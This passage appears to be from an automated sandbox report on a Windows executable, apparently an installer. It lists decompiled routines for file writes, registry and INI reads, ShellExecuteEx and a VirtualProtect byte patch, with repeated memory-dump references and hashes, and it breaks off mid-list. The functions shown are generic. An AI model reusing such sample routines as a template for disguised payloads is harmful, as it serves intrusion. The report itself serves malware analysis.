                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
                                                      • Instruction ID: a6de1eac7d35dbb408d2fa80093daaad73b751b804ef2b379125a3e319db5d80
                                                      • Opcode Fuzzy Hash: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
                                                      • Instruction Fuzzy Hash: 46E0EC3221565AABEF119E559C00AEB7B6CEB05360F004476FD15E3190D6B1FA219BA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405BBD Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00405BBD(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                      0x00405bc1
                                                      0x00405bd1
                                                      0x00405bd9
                                                      0x00000000
                                                      0x00405be0
                                                      0x00000000
                                                      0x00405be2

                                                      APIs
                                                      • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403154,00000000,0078A0F8,000000FF,0078A0F8,000000FF,000000FF,00000004,00000000), ref: 00405BD1
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: FileWrite
                                                      • String ID:
                                                      • API String ID: 3934441357-0
                                                      • Opcode ID: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                                                      • Instruction ID: b26364db078b9021274dcd752d930f9f8b31cc58193ee345d62fa94dbd0509c3
                                                      • Opcode Fuzzy Hash: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                                                      • Instruction Fuzzy Hash: 2EE0EC3221865AABDF609E559C00AEB7B7CEB05364F044437F925EA190D631F821DBA8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 706B28E1 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x706b4038 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x706b404c, 4, 0x40, 0x706b403c); // executed
					 *0x706b404c = 0xc2;
					 *0x706b403c = 0;
					 *0x706b4044 = 0;
					 *0x706b4058 = 0;
					 *0x706b4048 = 0;
					 *0x706b4040 = 0;
					 *0x706b4050 = 0;
					 *0x706b404e = 0;
				}
				return 1;
			}



                                                      0x706b28ea
                                                      0x706b28ef
                                                      0x706b28ff
                                                      0x706b2907
                                                      0x706b290e
                                                      0x706b2913
                                                      0x706b2918
                                                      0x706b291d
                                                      0x706b2922
                                                      0x706b2927
                                                      0x706b292c
                                                      0x706b292c
                                                      0x706b2934

                                                      APIs
                                                      • VirtualProtect.KERNELBASE(706B404C,00000004,00000040,706B403C), ref: 706B28FF
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1880663434.00000000706B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 706B0000, based on PE: true
                                                      • Associated: 00000002.00000002.1880594487.00000000706B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.1880732550.00000000706B3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.1880781272.00000000706B5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_706b0000_download.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 8632835d39996d20ae29b24d71643f54fb0789fd4f1c3abb76f25be8f8b20f62
                                                      • Instruction ID: 9e508f8297a71ebe6f3dd2c49ff77368f65e86a31a97a159256825e3b7ec72a0
                                                      • Opcode Fuzzy Hash: 8632835d39996d20ae29b24d71643f54fb0789fd4f1c3abb76f25be8f8b20f62
                                                      • Instruction Fuzzy Hash: 5EF028F3508291DEC760EF6A8CA8B053EF1A729295B32476AE75CD62A1E3B854448B11
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402340 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00402340(char __ebx) {
				char _t7;
				CHAR* _t8;
				CHAR* _t19;
				void* _t21;
				void* _t24;

				_t7 =  *0x40a010; // 0xa
				 *(_t21 + 0xa) = _t7;
				_t8 = E00402ACB(1);
				 *(_t21 - 0x3c) = E00402ACB(0x12);
				GetPrivateProfileStringA(_t8,  *(_t21 - 0x3c), _t21 + 0xa, _t19, 0x3ff, E00402ACB(0xffffffdd)); // executed
				_t24 =  *_t19 - 0xa;
				if(_t24 == 0) {
					 *((intOrPtr*)(_t21 - 4)) = 1;
					 *_t19 = __ebx;
				}
				 *0x7a2fe8 =  *0x7a2fe8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}








                                                      0x00402340
                                                      0x00402348
                                                      0x0040234c
                                                      0x0040235c
                                                      0x00402373
                                                      0x00402379
                                                      0x0040173b
                                                      0x004026f0
                                                      0x004026f7
                                                      0x004026f7
                                                      0x0040295a
                                                      0x00402966

                                                      APIs
                                                      • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402373
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfileString
                                                      • String ID:
                                                      • API String ID: 1096422788-0
                                                      • Opcode ID: e634efb2739fac2aca00153e77e0a6ce01b8612d3462cd0d1e8aa1f1549dbd2c
                                                      • Instruction ID: 8e029bd2b2674609338b614665d9252e3eb93026fbeeab8b0acd3e0b98e79a96
                                                      • Opcode Fuzzy Hash: e634efb2739fac2aca00153e77e0a6ce01b8612d3462cd0d1e8aa1f1549dbd2c
                                                      • Instruction Fuzzy Hash: 2EE0803090430479DB10AFA18E0AEAD35649F41714F144839F5507B0D1EEB544419B3D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405E03 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00405E03(void* __eflags, intOrPtr _a4, char* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00405D88(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExA(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}






                                                      0x00405e0d
                                                      0x00405e14
                                                      0x00405e27
                                                      0x00000000
                                                      0x00405e27
                                                      0x00405e18
                                                      0x00000000

                                                      APIs
                                                      • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405E91,?,?,?,?,00000002,Call), ref: 00405E27
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Open
                                                      • String ID:
                                                      • API String ID: 71445658-0
                                                      • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                      • Instruction ID: 2a8135548ed97db7cee66e6f72713ae5fed4585321cbc755a00175e49ece29d7
                                                      • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                      • Instruction Fuzzy Hash: B7D0EC32000209BADF115F90ED05FAB371DEB08350F004C26BE45A4091D6759530AA58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040159D Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0040159D() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesA(E00402ACB(0xfffffff0),  *(_t11 - 0x24)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x7a2fe8 =  *0x7a2fe8 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}






                                                      0x004015a8
                                                      0x004015ae
                                                      0x004015b0
                                                      0x0040271c
                                                      0x0040271c
                                                      0x0040295a
                                                      0x00402966

                                                      APIs
                                                      • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: 0cab36499558db6e8e20a76730a0526e1850ad136f29eccd2b2fbe03c7a71729
                                                      • Instruction ID: 6c3c7c81edca22ef1082c61e7c8c2dbb2dad1037c78d96895750c72c7df92d73
                                                      • Opcode Fuzzy Hash: 0cab36499558db6e8e20a76730a0526e1850ad136f29eccd2b2fbe03c7a71729
                                                      • Instruction Fuzzy Hash: 81D01272704111DBCB01EBE89B489DDB7A49B40328B308537D111F21D1D6B98A45A72D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401563 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ShowWindow.USER32(0001040E), ref: 00401596
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: ShowWindow
                                                      • String ID:
                                                      • API String ID: 1268545403-0
                                                      • Opcode ID: a7e7ca525386e16ee7e89cfb1fc4c75f42d594badfd29f8b07d6e0c03fd97da5
                                                      • Instruction ID: a21bfe6b1d13300a8ee4ecaf898b43311dd8cfbd3fc211a1c449442b6368b73e
                                                      • Opcode Fuzzy Hash: a7e7ca525386e16ee7e89cfb1fc4c75f42d594badfd29f8b07d6e0c03fd97da5
                                                      • Instruction Fuzzy Hash: 81D0A97A304122EBCA01F3E8A90889EE7A08B913183304033E202B50E1D0BC4603BBEF
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404068 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00404068(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x7a2718; // 0x10408
				if(_t2 != 0) {
					_t3 = SendMessageA(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}





                                                      0x00404068
                                                      0x0040406f
                                                      0x0040407a
                                                      0x00000000
                                                      0x0040407a
                                                      0x00404080

                                                      APIs
                                                      • SendMessageA.USER32(00010408,00000000,00000000,00000000), ref: 0040407A
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: a3efc5eb78e3e56d017e2e6455c4acb5d850ed487973469c59e03f22f97d3db8
                                                      • Instruction ID: 451079f561cf800dc5e0e3c220f6615dfdf47e2dc175ffa0b928ab0310d81608
                                                      • Opcode Fuzzy Hash: a3efc5eb78e3e56d017e2e6455c4acb5d850ed487973469c59e03f22f97d3db8
                                                      • Instruction Fuzzy Hash: E0C09B717407007BFA20CB649E49F077798AB90710F15842DB790F50E1C674E410DA1C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404051 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00404051(int _a4) {
				long _t2;

				_t2 = SendMessageA( *0x7a2f48, 0x28, _a4, 1); // executed
				return _t2;
			}




                                                      0x0040405f
                                                      0x00404065

                                                      APIs
                                                      • SendMessageA.USER32(00000028,?,00000001,00403E81), ref: 0040405F
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: 346968a0720bb3734bf3dae4b81c014f7857494700bdb546aecc84c256ab8e1e
                                                      • Instruction ID: f42b45c65ed6a3ee6e87ec929b41dfaaf359f69b17cd9f6c2b1881eba3545dd7
                                                      • Opcode Fuzzy Hash: 346968a0720bb3734bf3dae4b81c014f7857494700bdb546aecc84c256ab8e1e
                                                      • Instruction Fuzzy Hash: 64B09235180A00AAEA114B00DE09F457A62A7A4701F008068B250240F1CAB200A1DB08
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040565F Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0040565F(struct _SHELLEXECUTEINFOA* _a4) {
				struct _SHELLEXECUTEINFOA* _t4;
				int _t5;

				_t4 = _a4;
				_t4->lpIDList = _t4->lpIDList & 0x00000000;
				_t4->cbSize = 0x3c; // executed
				_t5 = ShellExecuteExA(_t4); // executed
				return _t5;
			}





                                                      0x0040565f
                                                      0x00405664
                                                      0x00405668
                                                      0x0040566e
                                                      0x00405674

                                                      APIs
                                                      • ShellExecuteExA.SHELL32(?,00401EC2,?), ref: 0040566E
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: ExecuteShell
                                                      • String ID:
                                                      • API String ID: 587946157-0
                                                      • Opcode ID: 3dbb5c45fd0362357dc29e094c299a4b113cabf0b50495ccaf1730ce731ee503
                                                      • Instruction ID: fedc52184ae6edd1acf052e6849869f1d6de8b7351bc39b82099fbd6471e80b9
                                                      • Opcode Fuzzy Hash: 3dbb5c45fd0362357dc29e094c299a4b113cabf0b50495ccaf1730ce731ee503
                                                      • Instruction Fuzzy Hash: ECC092B2000200DFE301CF90CB18F077BE8AF55306F028058E1C49A160C7788810CB69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004031A1 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E004031A1(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                      0x004031af
                                                      0x004031b5

                                                      APIs
                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F2A,0003FBE4), ref: 004031AF
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
